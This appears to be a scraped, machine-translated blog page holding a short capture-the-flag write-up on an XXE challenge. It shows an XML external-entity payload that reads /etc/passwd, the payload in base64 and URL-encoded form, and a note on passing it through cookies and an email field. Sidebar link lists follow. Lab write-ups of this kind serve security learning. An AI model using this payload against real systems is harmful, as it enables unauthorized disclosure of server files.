当前位置:网站首页>Primary school, session 3 - afternoon: Web_ xxe
Primary school, session 3 - afternoon: Web_ xxe
2022-06-30 19:50:00 【Part 02】
hint:
1.cookie
2. the base64 code
Grab the bag and check Cookie, Different from the usual , Yes version, bracket, bracket2
bracket2 the URL encryption , Come back
base64 After decoding , You can see the order of the three
The order should be bracket+version+bracket2
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
Code the written statement
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgQU5ZIFs8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg==
URL code
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgQU5ZIFs8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg%3D%3D
Take three sections and put them in corresponding positions
&xxe;
URL code
%26xxe%3B
Need to call xxe, Find the point that can be called
stay email Can successfully call
Repeat the above method to find flag
边栏推荐
- A detailed explanation of the implementation principle of go Distributed Link Tracking
- KubeVela 1.4:让应用交付更安全、上手更简单、过程更透明
- WeakSet
- 假期安全不放假,VR交通让孩子安全出行|广州华锐视点
- 广州炒股开户选择手机办理安全吗?
- 软件工程最佳实践——项目需求分析
- 十分之坑,tar命令解压文件的时候竟然不能解析英文括号“()”
- JVM FAQs
- FH6908A负极关断同步整流模拟低压降二极管控制IC芯片TSOT23-6超低功耗整流器 1w功耗 <100uA静态 替代MP6908
- 当我们在看待产业互联网的时候,总是会站在消费互联网的对立面来看待它
猜你喜欢
为什么数字化转型战略必须包括持续测试?
The former king of fruit juice sold for 1.6 billion yuan
线上线下双结合,VR全景是家具线上转型好方法!
Detailed explanation of specific methods and steps for TCP communication between s7-1500 PLCs (picture and text)
[JetsonNano] [教程] [入门系列] [一] 如何开启VNC共享
Inventory the six second level capabilities of Huawei cloud gaussdb (for redis)
KubeVela 1.4:让应用交付更安全、上手更简单、过程更透明
Unity 如何拖拉多个组件中的一个
Code shoe set - mt3435 · assignment - bipartite graph problem - Graphic explanation
小学期,第三场-下午:WEB_sessionlfi
随机推荐
小学期,第三场-下午:WEB_sessionlfi
闲鱼难“翻身”
一文读懂目标检测:R-CNN、Fast R-CNN、Faster R-CNN、YOLO、SSD「建议收藏」
[solved] how does Tiktok cancel paying attention to the cancelled account
Alibaba Tianchi SQL training camp learning notes 5
Redis beginner to master 01
Abaqus 2022软件安装包和安装教程
MySQL billing Statistics (Part 1): MySQL installation and client dbeaver connection
pycharm从安装到全副武装,学起来才嗖嗖的快,图片超多,因为过度详细!
Convert seconds to * * hours * * minutes
正则系列之字符类
DELL R720服务器安装网卡Broadcom 5720驱动
派尔特医疗在港交所招股书二次“失效”,上市计划实质性延迟
重复乃技艺之母
解决arm_release_ver of this libmali is ‘g2p0-01eac0‘,rk_so_ver is ‘4‘,libgl1-mesa-dev不会被安装,存在未满足的依赖关系
Smarter! Airiot accelerates the upgrading of energy conservation and emission reduction in the coal industry
将秒数转换为**小时**分钟
[jetsonnano] [tutorial] [introductory series] [i] how to enable VNC sharing
WeakSet
RP原型资源分享-购物类App